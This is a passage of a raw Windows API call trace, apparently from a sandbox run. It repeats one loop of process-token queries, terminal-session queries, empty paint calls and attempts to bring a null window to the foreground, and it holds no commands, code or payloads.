SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.871] WTSFreeMemory (pMemory=0x0) [0071.871] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.871] TextOutW (hdc=0x0, x=754, y=1649, lpString="", c=0) returned 1 [0071.871] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.871] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.871] GetTickCount () returned 0x1f0f2 [0071.873] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.873] SetForegroundWindow (hWnd=0x0) returned 0 [0071.873] BringWindowToTop (hWnd=0x0) returned 0 [0071.873] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x35c) returned 1 [0071.873] GetTokenInformation (in: TokenHandle=0x35c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.873] GetLastError () returned 0x7a [0071.873] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.873] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.873] WTSFreeMemory (pMemory=0x0) [0071.873] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.876] TextOutW (hdc=0x0, x=764, y=1674, lpString="", c=0) returned 1 [0071.876] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.876] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.876] GetTickCount () returned 0x1f0f2 [0071.877] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.877] SetForegroundWindow (hWnd=0x0) returned 0 [0071.877] BringWindowToTop (hWnd=0x0) returned 0 [0071.877] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x360) returned 1 [0071.877] GetTokenInformation (in: TokenHandle=0x360, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.877] GetLastError () returned 0x7a [0071.877] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.877] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.878] WTSFreeMemory (pMemory=0x0) [0071.878] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.878] TextOutW (hdc=0x0, x=774, y=1699, lpString="", c=0) returned 1 [0071.878] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.878] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.878] GetTickCount () returned 0x1f102 [0071.883] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.883] SetForegroundWindow (hWnd=0x0) returned 0 [0071.883] BringWindowToTop (hWnd=0x0) returned 0 [0071.883] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x364) returned 1 [0071.883] GetTokenInformation (in: TokenHandle=0x364, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.883] GetLastError () returned 0x7a [0071.883] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.883] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.884] WTSFreeMemory (pMemory=0x0) [0071.884] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.884] TextOutW (hdc=0x0, x=784, y=1724, lpString="", c=0) returned 1 [0071.884] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.884] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.884] GetTickCount () returned 0x1f102 [0071.884] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.885] SetForegroundWindow (hWnd=0x0) returned 0 [0071.885] BringWindowToTop (hWnd=0x0) returned 0 [0071.885] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x368) returned 1 [0071.885] GetTokenInformation (in: TokenHandle=0x368, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.885] GetLastError () returned 0x7a [0071.885] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.885] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.885] WTSFreeMemory (pMemory=0x0) [0071.885] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.885] TextOutW (hdc=0x0, x=794, y=1749, lpString="", c=0) returned 1 [0071.885] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.885] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.885] GetTickCount () returned 0x1f102 [0071.887] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.887] SetForegroundWindow (hWnd=0x0) returned 0 [0071.887] BringWindowToTop (hWnd=0x0) returned 0 [0071.887] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x36c) returned 1 [0071.887] GetTokenInformation (in: TokenHandle=0x36c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.887] GetLastError () returned 0x7a [0071.887] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.887] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.888] WTSFreeMemory (pMemory=0x0) [0071.888] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.888] TextOutW (hdc=0x0, x=804, y=1774, lpString="", c=0) returned 1 [0071.888] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.888] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.888] GetTickCount () returned 0x1f102 [0071.889] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.889] SetForegroundWindow (hWnd=0x0) returned 0 [0071.889] BringWindowToTop (hWnd=0x0) returned 0 [0071.889] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x370) returned 1 [0071.889] GetTokenInformation (in: TokenHandle=0x370, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.889] GetLastError () returned 0x7a [0071.889] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.889] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.890] WTSFreeMemory (pMemory=0x0) [0071.890] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.890] TextOutW (hdc=0x0, x=814, y=1799, lpString="", c=0) returned 1 [0071.890] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.890] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.890] GetTickCount () returned 0x1f102 [0071.892] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.892] SetForegroundWindow (hWnd=0x0) returned 0 [0071.892] BringWindowToTop (hWnd=0x0) returned 0 [0071.892] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x374) returned 1 [0071.892] GetTokenInformation (in: TokenHandle=0x374, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.892] GetLastError () returned 0x7a [0071.892] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.892] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.893] WTSFreeMemory (pMemory=0x0) [0071.893] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.893] TextOutW (hdc=0x0, x=824, y=1824, lpString="", c=0) returned 1 [0071.893] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.893] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.893] GetTickCount () returned 0x1f102 [0071.896] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.896] SetForegroundWindow (hWnd=0x0) returned 0 [0071.896] BringWindowToTop (hWnd=0x0) returned 0 [0071.896] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x378) returned 1 [0071.897] GetTokenInformation (in: TokenHandle=0x378, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.897] GetLastError () returned 0x7a [0071.897] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.897] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.897] WTSFreeMemory (pMemory=0x0) [0071.897] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.897] TextOutW (hdc=0x0, x=834, y=1849, lpString="", c=0) returned 1 [0071.897] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.897] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.897] GetTickCount () returned 0x1f112 [0071.899] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.899] SetForegroundWindow (hWnd=0x0) returned 0 [0071.899] BringWindowToTop (hWnd=0x0) returned 0 [0071.899] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x37c) returned 1 [0071.899] GetTokenInformation (in: TokenHandle=0x37c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.899] GetLastError () returned 0x7a [0071.899] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.899] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.900] WTSFreeMemory (pMemory=0x0) [0071.900] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.900] TextOutW (hdc=0x0, x=844, y=1874, lpString="", c=0) returned 1 [0071.900] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.900] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.900] GetTickCount () returned 0x1f112 [0071.901] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.901] SetForegroundWindow (hWnd=0x0) returned 0 [0071.901] BringWindowToTop (hWnd=0x0) returned 0 [0071.901] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x380) returned 1 [0071.901] GetTokenInformation (in: TokenHandle=0x380, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.901] GetLastError () returned 0x7a [0071.901] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.901] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.902] WTSFreeMemory (pMemory=0x0) [0071.902] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.902] TextOutW (hdc=0x0, x=854, y=1899, lpString="", c=0) returned 1 [0071.902] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.902] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.902] GetTickCount () returned 0x1f112 [0071.903] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.903] SetForegroundWindow (hWnd=0x0) returned 0 [0071.903] BringWindowToTop (hWnd=0x0) returned 0 [0071.903] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x384) returned 1 [0071.903] GetTokenInformation (in: TokenHandle=0x384, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.903] GetLastError () returned 0x7a [0071.904] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.904] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.904] WTSFreeMemory (pMemory=0x0) [0071.904] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.904] TextOutW (hdc=0x0, x=864, y=1924, lpString="", c=0) returned 1 [0071.904] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.904] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.904] GetTickCount () returned 0x1f112 [0071.905] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.905] SetForegroundWindow (hWnd=0x0) returned 0 [0071.905] BringWindowToTop (hWnd=0x0) returned 0 [0071.905] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x388) returned 1 [0071.905] GetTokenInformation (in: TokenHandle=0x388, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.905] GetLastError () returned 0x7a [0071.905] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.905] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.905] WTSFreeMemory (pMemory=0x0) [0071.905] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.906] TextOutW (hdc=0x0, x=874, y=1949, lpString="", c=0) returned 1 [0071.906] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.906] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.906] GetTickCount () returned 0x1f112 [0071.907] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.907] SetForegroundWindow (hWnd=0x0) returned 0 [0071.907] BringWindowToTop (hWnd=0x0) returned 0 [0071.907] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x38c) returned 1 [0071.907] GetTokenInformation (in: TokenHandle=0x38c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.907] GetLastError () returned 0x7a [0071.907] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.907] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.908] WTSFreeMemory (pMemory=0x0) [0071.908] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.908] TextOutW (hdc=0x0, x=884, y=1974, lpString="", c=0) returned 1 [0071.908] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.908] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.908] GetTickCount () returned 0x1f112 [0071.909] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.909] SetForegroundWindow (hWnd=0x0) returned 0 [0071.909] BringWindowToTop (hWnd=0x0) returned 0 [0071.909] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x390) returned 1 [0071.909] GetTokenInformation (in: TokenHandle=0x390, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.909] GetLastError () returned 0x7a [0071.909] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.909] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.910] WTSFreeMemory (pMemory=0x0) [0071.910] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.910] TextOutW (hdc=0x0, x=894, y=1999, lpString="", c=0) returned 1 [0071.910] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.910] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.910] GetTickCount () returned 0x1f121 [0071.911] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.911] SetForegroundWindow (hWnd=0x0) returned 0 [0071.912] BringWindowToTop (hWnd=0x0) returned 0 [0071.912] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x394) returned 1 [0071.912] GetTokenInformation (in: TokenHandle=0x394, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.912] GetLastError () returned 0x7a [0071.912] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.912] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.912] WTSFreeMemory (pMemory=0x0) [0071.912] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.912] TextOutW (hdc=0x0, x=904, y=2024, lpString="", c=0) returned 1 [0071.912] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.912] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.912] GetTickCount () returned 0x1f121 [0071.913] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.913] SetForegroundWindow (hWnd=0x0) returned 0 [0071.913] BringWindowToTop (hWnd=0x0) returned 0 [0071.913] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x398) returned 1 [0071.913] GetTokenInformation (in: TokenHandle=0x398, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.913] GetLastError () returned 0x7a [0071.913] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.913] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.914] WTSFreeMemory (pMemory=0x0) [0071.914] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.914] TextOutW (hdc=0x0, x=914, y=2049, lpString="", c=0) returned 1 [0071.914] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.914] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.914] GetTickCount () returned 0x1f121 [0071.916] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.916] SetForegroundWindow (hWnd=0x0) returned 0 [0071.916] BringWindowToTop (hWnd=0x0) returned 0 [0071.916] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x39c) returned 1 [0071.916] GetTokenInformation (in: TokenHandle=0x39c, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.916] GetLastError () returned 0x7a [0071.916] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.916] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.916] WTSFreeMemory (pMemory=0x0) [0071.916] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.916] TextOutW (hdc=0x0, x=924, y=2074, lpString="", c=0) returned 1 [0071.916] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.917] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.917] GetTickCount () returned 0x1f121 [0071.917] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.917] SetForegroundWindow (hWnd=0x0) returned 0 [0071.917] BringWindowToTop (hWnd=0x0) returned 0 [0071.918] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3a0) returned 1 [0071.918] GetTokenInformation (in: TokenHandle=0x3a0, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.918] GetLastError () returned 0x7a [0071.918] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.918] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.918] WTSFreeMemory (pMemory=0x0) [0071.918] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.918] TextOutW (hdc=0x0, x=934, y=2099, lpString="", c=0) returned 1 [0071.918] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.918] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.918] GetTickCount () returned 0x1f121 [0071.920] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.920] SetForegroundWindow (hWnd=0x0) returned 0 [0071.920] BringWindowToTop (hWnd=0x0) returned 0 [0071.920] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3a4) returned 1 [0071.920] GetTokenInformation (in: TokenHandle=0x3a4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.920] GetLastError () returned 0x7a [0071.920] SetupDiDestroyDriverInfoList (DeviceInfoSet=0x0, DeviceInfoData=0x0, DriverType=0x1) returned 0 [0071.920] WTSQuerySessionInformationA (in: hServer=0x0, SessionId=0x77e, WTSInfoClass=0x5, ppBuffer=0x20ba40c, pBytesReturned=0x20ba404 | out: ppBuffer=0x20ba40c*=0x0, pBytesReturned=0x20ba404) returned 0 [0071.920] WTSFreeMemory (pMemory=0x0) [0071.921] BeginPaint (in: hWnd=0x0, lpPaint=0x20ba5fc | out: lpPaint=0x20ba5fc) returned 0x0 [0071.921] TextOutW (hdc=0x0, x=944, y=2124, lpString="", c=0) returned 1 [0071.921] EndPaint (hWnd=0x0, lpPaint=0x20ba5fc) returned 0 [0071.921] GetClientRect (in: hWnd=0x0, lpRect=0x20ba5e0 | out: lpRect=0x20ba5e0) returned 0 [0071.921] GetTickCount () returned 0x1f121 [0071.921] SwitchToThisWindow (hwnd=0x0, fUnknown=0) [0071.921] SetForegroundWindow (hWnd=0x0) returned 0 [0071.921] BringWindowToTop (hWnd=0x0) returned 0 [0071.921] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x20ba42c | out: TokenHandle=0x20ba42c*=0x3a8) returned 1 [0071.921] GetTokenInformation (in: TokenHandle=0x3a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x20ba434 | out: TokenInformation=0x0, ReturnLength=0x20ba434) returned 0 [0071.922] 